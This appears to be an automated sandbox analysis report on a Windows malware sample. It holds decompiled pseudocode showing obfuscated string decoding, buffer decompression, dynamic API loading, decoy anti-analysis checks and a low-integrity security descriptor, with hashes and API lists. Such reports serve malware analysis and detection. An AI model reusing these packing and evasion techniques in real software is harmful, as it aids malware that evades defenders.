				 *0x42a520 =  *_t5; // executed
				E0040101D("utanwvwedwitpi%X"); // executed
				_t64 = 0xae044e5e; // executed
				_t30 = E00401326(_t64); // executed
				if(_t30 == 0) {
					L6:
					_t31 = E0040127D();
					_t72 = L"hrerfdyfhhenxpdyhxbihq";
					if(_t31 != 0) {
						mciSendStringW(_t72, 0, 0, 0);
						mciSendStringW(L"qyphlupgwgxraa", 0, 0, 0);
					} else {
						MessageBoxW(GetActiveWindow(), _t72, L"vltqggw", 0x30);
					}
					_v12 = 0;
					__imp__WintrustGetRegPolicyFlags( &_v16);
					__imp__ImageEnumerateCertificates( *0x42a514, 0xff,  &_v12,  &_v608, 0x80);
					_t37 =  &_v20;
					__imp__GetActivePwrScheme(_t37);
					if(_t37 != 0) {
						_t42 =  &_v96;
						__imp__GetPwrCapabilities(_t42);
						if(_t42 != 0) {
							__imp__IsPwrHibernateAllowed();
							if(_t42 == 0) {
								__imp__IsPwrShutdownAllowed();
								if(_t42 != 0) {
									MessageBoxA(0, "mffdomjatpjdwpjj", "elqylo", 0x10);
								}
							} else {
								MessageBoxW(0, _t72, L"vltqggw", 0x30);
							}
						}
					}
					L15:
					E0040101D(_t60);
					ShowWindow(_v8, 0);
					UpdateWindow(_v8);
					return _v8;
				}
				_push(0xae044e5e);
				E0040101D("utanwvwedwitpi%X"); // executed
				_t48 = E004012DE(); // executed
				 *0x428280 = _t48 + 0xae044e5e;
				if(E00426D37() +  *0x428280 == 0) {
					goto L6;
				}
				E0040101D(_t60); // executed
				 *_t74 = 0x4294bc;
				if(RegisterClassExA(??) != 0) {
					E0040101D(_t60); // executed
					 *_t74 = "mvyekutimwkpvmfvnm";
					_t55 = FindWindowA(0, ??); // executed
					_t73 = _t55;
					if(_t73 != 0) {
						SetWindowPos(_t73, 0, 0, 0, 0, 0, 3);
						SetFocus(_t73);
					}
					_t57 = CreateWindowExA(0, 0x4294f0, "rwqnvgmlfijtgw", 0xcf0000, 0x80000000, 0, 0x80000000, 0, 0, 0,  *0x42a514, 0); // executed
					_v8 = _t57;
					if(_t57 != 0) {
						goto L15;
					}
				}
			}

0x0040135d
0x00401366
0x0040136b
0x00401371
0x00401379
0x0040137c
0x00401381
0x00401386
0x0040138b
0x0040138f
0x00401394
0x00401399
0x0040139e
0x004013a8
0x004013ad
0x004013ba
0x004013bf
0x004013c4
0x004013d2
0x004013d7
0x004013dd
0x004013de
0x004013e5
0x0040148b
0x0040148b
0x00401490
0x00401497
0x004014b4
0x004014c2
0x00401499
0x004014a8
0x004014a8
0x004014cc
0x004014cf
0x004014f0
0x004014f6
0x004014fa
0x00401502
0x00401504
0x00401508
0x00401510
0x00401512
0x0040151a
0x0040152d
0x00401535
0x00401544
0x00401544
0x0040151c
0x00401525
0x00401525
0x0040151a
0x00401510
0x0040154a
0x0040154b
0x00401555
0x0040155e
0x0040156b
0x0040156b
0x004013eb
0x004013f1
0x004013f8
0x004013ff
0x0040140f
0x00000000
0x00000000
0x00401412
0x00401417
0x00401427
0x0040142a
0x0040142f
0x00401437
0x0040143d
0x00401441
0x0040144b
0x00401452
0x00401452
0x0040147a
0x00401480
0x00401485
0x00000000
0x00000000
0x00401485

APIs

Part of subcall function 0040101D: OutputDebugStringA.KERNELBASE(?), ref: 00401027

Part of subcall function 00401032: lstrlenA.KERNEL32(RegisterClassExA,?,00000080,00000000,asdxgbn), ref: 00401052

Part of subcall function 004011B6: LoadLibraryA.KERNEL32(CRYPT32,?,004013BA,00000000,00000000), ref: 004011D0
Part of subcall function 004011B6: GetProcAddress.KERNEL32(?,?), ref: 0040122A

Part of subcall function 00401326: NtAllocateVirtualMemory.NTDLL(000000FF,004282A0,00000000,?,00001000,00000004,AE044E5E,?,004013E3,00000000,00000000), ref: 00401350

RegisterClassExA.USER32(asdxgbn), ref: 0040141E
FindWindowA.USER32 ref: 00401437
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000003), ref: 0040144B
SetFocus.USER32(00000000), ref: 00401452
CreateWindowExA.USER32 ref: 0040147A
GetActiveWindow.USER32 ref: 004014A1
MessageBoxW.USER32(00000000), ref: 004014A8
mciSendStringW.WINMM(hrerfdyfhhenxpdyhxbihq,00000000,00000000,00000000), ref: 004014B4
mciSendStringW.WINMM(qyphlupgwgxraa,00000000,00000000,00000000), ref: 004014C2
WintrustGetRegPolicyFlags.WINTRUST(?), ref: 004014CF
ImageEnumerateCertificates.IMAGEHLP(000000FF,00401596,?,00000080), ref: 004014F0
GetActivePwrScheme.POWRPROF(?), ref: 004014FA
GetPwrCapabilities.POWRPROF(?), ref: 00401508
IsPwrHibernateAllowed.POWRPROF ref: 00401512
MessageBoxW.USER32(00000000,hrerfdyfhhenxpdyhxbihq,vltqggw,00000030), ref: 00401525
IsPwrShutdownAllowed.POWRPROF ref: 0040152D
MessageBoxA.USER32 ref: 00401544
ShowWindow.USER32(?,00000000), ref: 00401555
UpdateWindow.USER32(?), ref: 0040155E

Part of subcall function 00426D37: lstrcpyA.KERNEL32(rwqnvgmlfijtgw,rwqnvgmlfijtgw,00000000,AE044E5E,asdxgbn,00401409,00000000,00000000), ref: 00426D50
Part of subcall function 00426D37: lstrcpyA.KERNEL32(004294F0,nkpbavksay), ref: 00426D5D

Strings

asdxgbn, xrefs: 00401371, 00401378, 0040138E, 00401411, 00401429, 0040154A
vltqggw, xrefs: 0040149B, 0040151E
elqylo, xrefs: 00401539
utanwvwedwitpi%X, xrefs: 004013CD, 004013EC
mffdomjatpjdwpjj, xrefs: 0040153E
qyphlupgwgxraa, xrefs: 004014BD
hrerfdyfhhenxpdyhxbihq, xrefs: 00401490, 004014A0, 004014B3, 00401523
rwqnvgmlfijtgw, xrefs: 0040146F
RegisterClassExA, xrefs: 004013A3

Memory Dump Source

Source File: 00000001.00000002.196926157.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.196922569.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.196944770.0000000000427000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.196948050.0000000000428000.00000004.00020000.sdmp Download File

Similarity

API ID: Window$MessageString$ActiveAllowedSendlstrcpy$AddressAllocateCapabilitiesCertificatesClassCreateDebugEnumerateFindFlagsFocusHibernateImageLibraryLoadMemoryOutputPolicyProcRegisterSchemeShowShutdownUpdateVirtualWintrustlstrlen
String ID: RegisterClassExA$asdxgbn$elqylo$hrerfdyfhhenxpdyhxbihq$mffdomjatpjdwpjj$qyphlupgwgxraa$rwqnvgmlfijtgw$utanwvwedwitpi%X$vltqggw
API String ID: 2637225914-4101549737
Opcode ID: d1a68afb3dc7677a7c77daf30ca3f62313878091e96745542a65db1886a29248
Instruction ID: b1cf619c449f384919144929dc10ea7b866c25cb33b5f8cc5e7dbd1e24f3fd02
Opcode Fuzzy Hash: d1a68afb3dc7677a7c77daf30ca3f62313878091e96745542a65db1886a29248
Instruction Fuzzy Hash: 01516071745254FBD720AFA1AC4DE6F3BB8EF85704B90407AF501A72A1DB3859068B3D

Uniqueness

Uniqueness Score: -1.00%

Function 0040156C, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40
windowlibraryCOMMON

Download Yara Rule

C-Code - Quality: 92%

			_entry_(void* __ebx, void* __edx, void* __edi) {
				struct tagMSG _v32;
				struct HINSTANCE__* _t4;
				intOrPtr _t5;
				void* _t6;
				void* _t17;
				void* _t18;

				_t18 = __edi;
				_t17 = __edx;
				_t4 = LoadLibraryA("skembuptpwnoq"); // executed
				if(_t4 == 0) {
					E004015DA(__ebx, __edi);
				}
				_push(_t18);
				_t25 =  *0x4294ec;
				if( *0x4294ec != 0) {
					_t6 = E0040135D(_t17, _t25); // executed
					if(_t6 != 0) {
						E0040101D("asdxgbn");
						while(GetMessageW( &_v32, 0, 0, 0) != 0) {
							TranslateMessage( &_v32);
							DispatchMessageW( &_v32);
						}
					}
				}
				_t5 =  *0x428278; // 0xf808ba61
				return _t5;
			}

0x0040156c
0x0040156c
0x00401577
0x0040157f
0x00401581
0x00401581
0x00401586
0x00401589
0x0040158f
0x00401591
0x00401598
0x004015a0
0x004015c2
0x004015b2
0x004015bc
0x004015bc
0x004015cf
0x00401598
0x004015d0
0x004015d7

APIs

LoadLibraryA.KERNELBASE(skembuptpwnoq), ref: 00401577
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004015C9

Part of subcall function 004015DA: HeapCreate.KERNELBASE(00000000,0016FCD8,00000000,00401586), ref: 004015EE
Part of subcall function 004015DA: GetProcessHeap.KERNEL32 ref: 004015FD

TranslateMessage.USER32(?), ref: 004015B2
DispatchMessageW.USER32 ref: 004015BC

Strings

skembuptpwnoq, xrefs: 00401572
asdxgbn, xrefs: 0040159B

Memory Dump Source

Source File: 00000001.00000002.196926157.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.196922569.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.196944770.0000000000427000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.196948050.0000000000428000.00000004.00020000.sdmp Download File

Similarity

API ID: Message$Heap$CreateDispatchLibraryLoadProcessTranslate
String ID: asdxgbn$skembuptpwnoq
API String ID: 2737112283-786223230
Opcode ID: 09187bcad27e6689cdf2f410951bc7de00e95bb09e38a8d6fe56869eb6a3a5eb
Instruction ID: b8b577bc6e1e9c6d54a923f300deb8b88bc48a7b8718f1efb16c422c0edca622
Opcode Fuzzy Hash: 09187bcad27e6689cdf2f410951bc7de00e95bb09e38a8d6fe56869eb6a3a5eb
Instruction Fuzzy Hash: 9BF06871B05105AACB307BE69C09D9B37ACA9C5755B40003BF502F61E0EA3C9406C76C

Uniqueness

Uniqueness Score: -1.00%

Function 00401032, Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 108
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00401032(CHAR* __esi) {
				CHAR* _v8;
				char _v136;
				intOrPtr _t19;
				signed char _t27;
				void* _t30;
				signed int _t32;
				void* _t34;
				void* _t37;
				signed int _t38;
				signed int _t39;
				signed int _t43;
				signed int _t44;
				signed int _t45;
				signed int _t46;
				signed int _t47;
				void* _t48;
				void* _t49;
				CHAR* _t50;
				void* _t51;
				void* _t52;
				void* _t53;
				signed int _t59;
				CHAR* _t60;
				CHAR* _t61;
				void* _t64;
				void* _t69;
				void* _t70;

				_t50 = __esi;
				_t32 =  *__esi;
				_t48 = 0x80;
				E00401000( &_v136, 0x80);
				lstrlenA(__esi);
				_v8 = __esi;
				_t34 = 0;
				_v8 = _v8 -  &_v136;
				while(1) {
					_t19 = _v8;
					_t43 = _t51 + _t34 - 0x84;
					if( *((char*)(_t19 + _t43)) == 0) {
						break;
					}
					_t37 = _t34;
					if(_t37 == 0) {
						_t32 = _t32;
					}
					_t44 = _t43;
					_t59 = _t44;
					if (_t59 != 0) goto L5;
					_push(_t32);
					if(_t59 <= 0) {
						_t50 = _t50;
						_t60 = _t50;
					}
					_pop(_t33);
					_t45 = _t44 >> 0xc0;
					if(_t60 == 0) {
						_t50 = _t50 ^ 0x00000000;
						_t61 = _t50;
					}
					_pop(_t32);
					_push(_t19);
					if(_t61 == 0) {
						_t37 = _t37;
						_t45 = _t45;
					}
					asm("ror ecx, 0x0");
					_t50 = _t50 & 0xffffffff;
					_t52 = _t51;
					_t49 = _t48;
					_t46 = _t45;
					_t51 = _t52;
					_t48 = _t49;
					_t64 = _t48;
					asm("clc");
					if(_t64 == 0 && _t64 == 0) {
					}
					_t47 = _t46;
					_t53 = _t53 + 1 - 1;
					_push(_t37);
					if(_t37 < 0) {
					}
					_pop(_t38);
					_t27 = ( &(_t50[4]))[_t38];
					if(_t27 == 0) {
						 *_t50 = 0;
					} else {
						_t30 = (_t27 ^ _t32) - _t38 - 1;
						 *_t47 = _t30;
						_t69 = _t30;
						if(_t69 < 0) {
							_t38 = _t38 >> 0xa0;
						}
						if(_t69 >= 0) {
							_t70 = _t47 - 0x2001cde9;
						}
						asm("std");
						asm("cld");
						_t39 = _t38 >> 0x80;
						if(_t70 < 0) {
							_t32 = _t32 & 0xffffffff;
						}
						asm("stc");
						asm("stc");
						_t34 = _t39 - 1 + 2;
						if(_t34 < _t48) {
							continue;
						} else {
						}
					}
					break;
				}
				_push(0xcba703a7);
				E0040101D("utanwvwedwitpi%X"); // executed
				lstrcpyA(_t50,  &_v136);
				return _t50;
			}

0x00401032
0x0040103c
0x0040103f
0x0040104c
0x00401052
0x00401058
0x00401061
0x00401063
0x00401066
0x00401066
0x00401069
0x00401074
0x00000000
0x00000000
0x0040107a
0x0040107d
0x0040107f
0x0040107f
0x00401083
0x00401083
0x00401087
0x00401089
0x0040108a
0x0040108c
0x0040108c
0x0040108c
0x00401090
0x00401091
0x00401095
0x00401097
0x00401097
0x00401097
0x0040109d
0x0040109e
0x0040109f
0x004010a3
0x004010a4
0x004010a4
0x004010a6
0x004010a9
0x004010b7
0x004010b8
0x004010c0
0x004010c6
0x004010c7
0x004010c7
0x004010ca
0x004010cb
0x004010cb
0x004010d1
0x004010d7
0x004010d8
0x004010d9
0x004010d9
0x004010e1
0x004010e2
0x004010e8
0x0040111d
0x004010ea
0x004010ee
0x004010f0
0x004010f2
0x004010f4
0x004010f6
0x004010f6
0x004010f9
0x004010fb
0x004010fb
0x00401101
0x00401102
0x00401103
0x00401106
0x00401108
0x00401108
0x00401110
0x00401111
0x00401112
0x00401115
0x00000000
0x00000000
0x0040111b
0x00401115
0x00000000
0x004010e8
0x00401120
0x0040112a
0x00401139
0x00401144

APIs

lstrlenA.KERNEL32(RegisterClassExA,?,00000080,00000000,asdxgbn), ref: 00401052
lstrcpyA.KERNEL32(RegisterClassExA,?), ref: 00401139

Strings

asdxgbn, xrefs: 0040103B, 00401089, 00401094
utanwvwedwitpi%X, xrefs: 00401125
RegisterClassExA, xrefs: 00401051, 00401138

Memory Dump Source

Source File: 00000001.00000002.196926157.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.196922569.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.196944770.0000000000427000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.196948050.0000000000428000.00000004.00020000.sdmp Download File

Similarity

API ID: lstrcpylstrlen
String ID: RegisterClassExA$asdxgbn$utanwvwedwitpi%X
API String ID: 2001356338-2097055956
Opcode ID: 562ecb3f2e7bf91c2d2565308de40c4e81d55c9979f5c1f8c58b7ec4d2763e48
Instruction ID: 07f287d97ca27ddc5ba74f29d2bb439432fb9165e9c7510170900d779993becb
Opcode Fuzzy Hash: 562ecb3f2e7bf91c2d2565308de40c4e81d55c9979f5c1f8c58b7ec4d2763e48
Instruction Fuzzy Hash: 3F218A725041451AEB284634EC44FF6735CDB56325F20427BF9D2F69E1E93D5986422C

Uniqueness

Uniqueness Score: -1.00%

Function 004268FF, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E004268FF(void** __esi) {
				long _v8;
				long _t11;

				_v8 = _v8 & 0x00000000;
				_push(0x393f5a76);
				_t22 = "utanwvwedwitpi%X";
				E0040101D("utanwvwedwitpi%X"); // executed
				if(RtlDecompressBuffer(2, __esi[1], __esi[3],  *__esi, __esi[2],  &_v8) >= 0) {
					_t11 = _v8;
				} else {
					_push(0x393f5a76);
					E0040101D(_t22);
					_t11 = 0;
				}
				return _t11;
			}

0x00426903
0x0042690e
0x0042690f
0x00426915
0x00426935
0x00426944
0x00426937
0x00426937
0x00426939
0x00426940
0x00426940
0x0042694a

APIs

Part of subcall function 0040101D: OutputDebugStringA.KERNELBASE(?), ref: 00401027

RtlDecompressBuffer.NTDLL(00000002,?,?,?,?,00000000), ref: 0042692D

Strings

vZ?9, xrefs: 00426909
utanwvwedwitpi%X, xrefs: 0042690F, 00426914, 00426938

Memory Dump Source

Source File: 00000001.00000002.196926157.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.196922569.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.196944770.0000000000427000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.196948050.0000000000428000.00000004.00020000.sdmp Download File

Similarity

API ID: BufferDebugDecompressOutputString
String ID: utanwvwedwitpi%X$vZ?9
API String ID: 1930138125-1856428638
Opcode ID: f4a2a957d1fd151c67f84e46318d4c1d7d1126c87e34c1deaac6c4d753f86417
Instruction ID: 96a43c1a094e9a86b8022360992b939b962f5b3b8db6b538c4a2f73bad3c5954
Opcode Fuzzy Hash: f4a2a957d1fd151c67f84e46318d4c1d7d1126c87e34c1deaac6c4d753f86417
Instruction Fuzzy Hash: 3FF08276304204BFDB215B91AC41F6AB3ACDF48768F20441FF55592450DA39A9406A29

Uniqueness

Uniqueness Score: -1.00%

Function 0040101D, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040101D(intOrPtr _a4) {
				char _v104;

				OutputDebugStringA( &_v104); // executed
				return _a4;
			}

0x00401027
0x00401031

APIs

OutputDebugStringA.KERNELBASE(?), ref: 00401027

Memory Dump Source

Source File: 00000001.00000002.196926157.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.196922569.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.196944770.0000000000427000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.196948050.0000000000428000.00000004.00020000.sdmp Download File

Similarity

API ID: DebugOutputString
String ID:
API String ID: 1166629820-0
Opcode ID: 16f9da7850fe19c8aa3675e0d762fd731bc684d1b19fa07f7496d48ebd9b1975
Instruction ID: 080f46a8c6ba56e89db4f77a5b49f8187b50dca24d7d144a4267d231319bf3d6
Opcode Fuzzy Hash: 16f9da7850fe19c8aa3675e0d762fd731bc684d1b19fa07f7496d48ebd9b1975
Instruction Fuzzy Hash: BFC09B7450430DD7CB10EFA4DD49C4A77FC5704248B404421BD05D7150D670E50E97A5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004011B6, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E004011B6(signed int __eax, void* __ebx, void* __edx, CHAR* _a4) {
				signed int _t5;
				struct HINSTANCE__* _t6;
				struct HINSTANCE__* _t7;
				void* _t9;
				void* _t11;
				void* _t14;
				void* _t33;
				struct HINSTANCE__* _t34;

				_t5 = __eax & 0x000000ff;
				if(_t5 == 0) {
					_t6 =  *0x42a510;
				} else {
					_t9 = _t5 - 1;
					if(_t9 == 0) {
						_t6 =  *0x42a518;
					} else {
						_t11 = _t9;
						if(_t11 == 0) {
							_t6 = GetModuleHandleA("user32");
						} else {
							_t33 = _t11 - 1;
							if(_t33 != 0) {
								_t6 = _a4;
							} else {
								_t6 = LoadLibraryA("CRYPT32");
							}
						}
					}
				}
				if(_t33 < 0) {
					_t14 = _t14;
				}
				_t7 = _t6;
				_t34 = _t7;
				if(_t34 < 0) {
					_push(_t20);
				}
				if(_t34 < 0) {
					_push(0xffffffc8);
				}
				asm("clc");
				_push(_t14);
				if(_t34 <= 0) {
					_t7 = _t7 & 0xffffffff;
				}
				return GetProcAddress(_t7, _a4);
			}

0x004011bc
0x004011bf
0x004011ec
0x004011c1
0x004011c1
0x004011c2
0x004011e5
0x004011c4
0x004011c5
0x004011c6
0x004011dd
0x004011c8
0x004011c8
0x004011c9
0x004011f3
0x004011cb
0x004011d0
0x004011d0
0x004011c9
0x004011c6
0x004011c2
0x004011f6
0x004011fb
0x004011fb
0x004011fd
0x004011fd
0x00401204
0x00401206
0x0040120b
0x0040120d
0x0040120f
0x00401211
0x00401214
0x00401215
0x0040121d
0x0040121f
0x0040121f
0x00401231

APIs

LoadLibraryA.KERNEL32(CRYPT32,?,004013BA,00000000,00000000), ref: 004011D0
GetModuleHandleA.KERNEL32(user32,?,004013BA,00000000,00000000), ref: 004011DD
GetProcAddress.KERNEL32(?,?), ref: 0040122A

Strings

user32, xrefs: 004011D8
CRYPT32, xrefs: 004011CB
RegisterClassExA, xrefs: 00401216

Memory Dump Source

Source File: 00000001.00000002.196926157.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.196922569.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.196944770.0000000000427000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.196948050.0000000000428000.00000004.00020000.sdmp Download File

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID: CRYPT32$RegisterClassExA$user32
API String ID: 310444273-2232810154
Opcode ID: 670dcde3ae91a9e5e7f274b53cdcf841251e9d64c32fab24beea06e296d6a298
Instruction ID: 3ce7b88f9b1dc3a37ec77f73e7e5260036a811fa714f6ebf591dca6d38fbdb25
Opcode Fuzzy Hash: 670dcde3ae91a9e5e7f274b53cdcf841251e9d64c32fab24beea06e296d6a298
Instruction Fuzzy Hash: 1B012B36218405A7C61C5758FD09A733764E358365B90027FF610FA1F1DA3C9945A26D

Uniqueness

Uniqueness Score: -1.00%

Function 00426D37, Relevance: 10.5, APIs: 2, Strings: 5, Instructions: 33
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00426D37() {

				lstrcpyA("rwqnvgmlfijtgw", "rwqnvgmlfijtgw");
				lstrcpyA(0x4294f0, "nkpbavksay");
				E00401000(0x4294bc, 0x30);
				 *0x4294e4 = 0x4294f0;
				 *0x4294c8 = 0;
				 *0x4294cc = 0;
				 *0x4294d4 = 0;
				 *0x4294d8 = 0;
				 *0x4294d0 =  *0x42a514;
				 *0x4294c4 = E0042664E;
				 *0x4294e0 = "skembuptpwnoq";
				 *0x4294c0 = 3;
				 *0x4294dc = 8;
				 *0x4294bc = 0x30;
				return 0x4294bc;
			}

0x00426d50
0x00426d5d
0x00426d67
0x00426d6e
0x00426d75
0x00426d7a
0x00426d7f
0x00426d84
0x00426d8c
0x00426d92
0x00426d9c
0x00426da6
0x00426db0
0x00426dba
0x00426dc5

APIs

lstrcpyA.KERNEL32(rwqnvgmlfijtgw,rwqnvgmlfijtgw,00000000,AE044E5E,asdxgbn,00401409,00000000,00000000), ref: 00426D50
lstrcpyA.KERNEL32(004294F0,nkpbavksay), ref: 00426D5D

Strings

skembuptpwnoq, xrefs: 00426D9C
asdxgbn, xrefs: 00426D37
rwqnvgmlfijtgw, xrefs: 00426D4B
rwqnvgmlfijtgw, xrefs: 00426D46
nkpbavksay, xrefs: 00426D52

Memory Dump Source

Source File: 00000001.00000002.196926157.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.196922569.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.196944770.0000000000427000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.196948050.0000000000428000.00000004.00020000.sdmp Download File

Similarity

API ID: lstrcpy
String ID: asdxgbn$nkpbavksay$rwqnvgmlfijtgw$rwqnvgmlfijtgw$skembuptpwnoq
API String ID: 3722407311-1356767260
Opcode ID: 9d39c724612e7431088e193fff5d89c917d7d346c62786b976b5d879546cda51
Instruction ID: 25d4d6ac1530167da3a82ba52cf70a5e76192f9e1f97e9040bb6dd4eddd4172b
Opcode Fuzzy Hash: 9d39c724612e7431088e193fff5d89c917d7d346c62786b976b5d879546cda51
Instruction Fuzzy Hash: 62F019B1B09220AEC360AF19BD44B167BE8BB48755FC4413BE108D7360C7B85907CBAC

Uniqueness

Uniqueness Score: -1.00%

Function 0040127D, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33memoryencryptionCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,00000100,?,?,?,?,?,?,00401490,00000000,00000000), ref: 0040128A
ClusterEnum.CLUSAPI(00000000,00000000,00000000,?,?), ref: 004012C1
CertCreateCertificateChainEngine.CRYPT32(00000028,?), ref: 004012D3

Strings

(, xrefs: 00401298

Memory Dump Source

Source File: 00000001.00000002.196926157.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.196922569.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.196944770.0000000000427000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.196948050.0000000000428000.00000004.00020000.sdmp Download File

Similarity

API ID: AllocCertCertificateChainClusterCreateEngineEnumLocal
String ID: (
API String ID: 3861096817-3887548279
Opcode ID: c411238210c3602e2c2c7bf56448234ba8e8688257f341490b9dd7694ceeb1bc
Instruction ID: cc5355077909c5ef1f8bae05d778cea170a8b4a070e63738bc56855dbbf67774
Opcode Fuzzy Hash: c411238210c3602e2c2c7bf56448234ba8e8688257f341490b9dd7694ceeb1bc
Instruction Fuzzy Hash: 37F05FB0D00209AFDB51DFA9C949BDEBBF8EB0C304F50406AE505F2250E7749A459F64

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: GqSL8M2a72.exe PID: 5864 Parent PID: 1832 GqSL8M2a72.exeCOMMON

Executed Functions

Function 00419997, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00419997(struct _SECURITY_DESCRIPTOR* __edi, intOrPtr* __esi) {
				signed int _v8;
				struct _ACL* _v12;
				int _v16;
				int _v20;
				void** _t19;
				struct _SECURITY_DESCRIPTOR* _t28;
				intOrPtr* _t29;

				_t29 = __esi;
				_t28 = __edi;
				if(InitializeSecurityDescriptor(__edi, 1) == 0 || SetSecurityDescriptorDacl(__edi, 1, 0, 0) == 0) {
					return 0;
				} else {
					_t19 =  &_v8;
					__imp__ConvertStringSecurityDescriptorToSecurityDescriptorW(L"S:(ML;;NRNWNX;;;LW)", 1, _t19, 0); // executed
					if(_t19 == 0) {
						L6:
						_v8 = _v8 | 0xffffffff;
						L7:
						if(_t29 != 0) {
							 *_t29 = 0xc;
							 *(_t29 + 4) = _t28;
							 *((intOrPtr*)(_t29 + 8)) = 0;
						}
						return _v8;
					}
					_v12 = 0;
					if(GetSecurityDescriptorSacl(_v8,  &_v20,  &_v12,  &_v16) == 0 || SetSecurityDescriptorSacl(__edi, _v20, _v12, _v16) == 0) {
						LocalFree(_v8);
						goto L6;
					} else {
						goto L7;
					}
				}
			}

0x00419997
0x00419997
0x004199a9
0x00000000
0x004199bc
0x004199bd
0x004199c8
0x004199d0
0x00419a0b
0x00419a0b
0x00419a0f
0x00419a11
0x00419a13
0x00419a19
0x00419a1c
0x00419a1c
0x00000000
0x00419a1f
0x004199e1
0x004199ec
0x00419a05
0x00000000
0x00000000
0x00000000
0x00000000
0x004199ec

APIs

InitializeSecurityDescriptor.ADVAPI32(00422BDC,00000001,00000000,0040EBA4,?,?,00000000), ref: 004199A1
SetSecurityDescriptorDacl.ADVAPI32(00422BDC,00000001,00000000,00000000,?,?,00000000), ref: 004199B2
ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 004199C8
GetSecurityDescriptorSacl.ADVAPI32(00000000,?,?,?,?,?,00000000), ref: 004199E4
SetSecurityDescriptorSacl.ADVAPI32(00422BDC,?,?,?,?,?,00000000), ref: 004199F8
LocalFree.KERNEL32(00000000,?,?,00000000), ref: 00419A05

Strings

S:(ML;;NRNWNX;;;LW), xrefs: 004199C3

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: DescriptorSecurity$Sacl$ConvertDaclFreeInitializeLocalString
String ID: S:(ML;;NRNWNX;;;LW)
API String ID: 2050860296-820036962
Opcode ID: ae5eff42829bf0abbd282ef598d1bd7c4a5dfcac86ac60d87ea5c9127743557e
Instruction ID: 7e85df226b47ed245a8c25255bcde44b019aa1121b8d04e61a0ba22cd7fa84a9
Opcode Fuzzy Hash: ae5eff42829bf0abbd282ef598d1bd7c4a5dfcac86ac60d87ea5c9127743557e
Instruction Fuzzy Hash: BB115E71A00288BFEB119FA08D84AEFBBBCEF04780F10416AF551F11A0D7758E849B14

Uniqueness

Uniqueness Score: -1.00%

Function 0040E97B, Relevance: 42.2, APIs: 15, Strings: 9, Instructions: 229
libraryloadermemoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E0040E97B(signed int** __ecx, void* __edx, signed char _a4) {
				char _v435;
				char _v796;
				char _v804;
				char _v816;
				intOrPtr _v824;
				intOrPtr _v828;
				signed int _v832;
				intOrPtr _v836;
				signed int** _v840;
				struct HINSTANCE__* _v844;
				void* __edi;
				void* __esi;
				signed int _t40;
				struct HINSTANCE__* _t43;
				struct HINSTANCE__* _t47;
				_Unknown_base(*)()* _t53;
				void* _t54;
				signed int _t57;
				void** _t58;
				void** _t60;
				signed int _t62;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				void* _t73;
				intOrPtr _t77;
				signed int _t78;
				signed int _t79;
				signed int _t80;
				struct HINSTANCE__* _t81;
				int _t83;
				signed int _t86;
				void* _t89;
				signed int* _t91;
				signed int _t95;
				WCHAR* _t97;
				void* _t98;
				signed int* _t100;
				void* _t109;
				void* _t110;
				void* _t111;
				void* _t112;

				_t89 = __edx;
				_t87 = __ecx;
				_t95 = _a4 & 0x00000001;
				_v832 = _t95;
				if(_t95 != 0) {
					_t83 = 0;
					__eflags = 0;
				} else {
					_t83 = 0;
					 *0x422b98 = 0;
				}
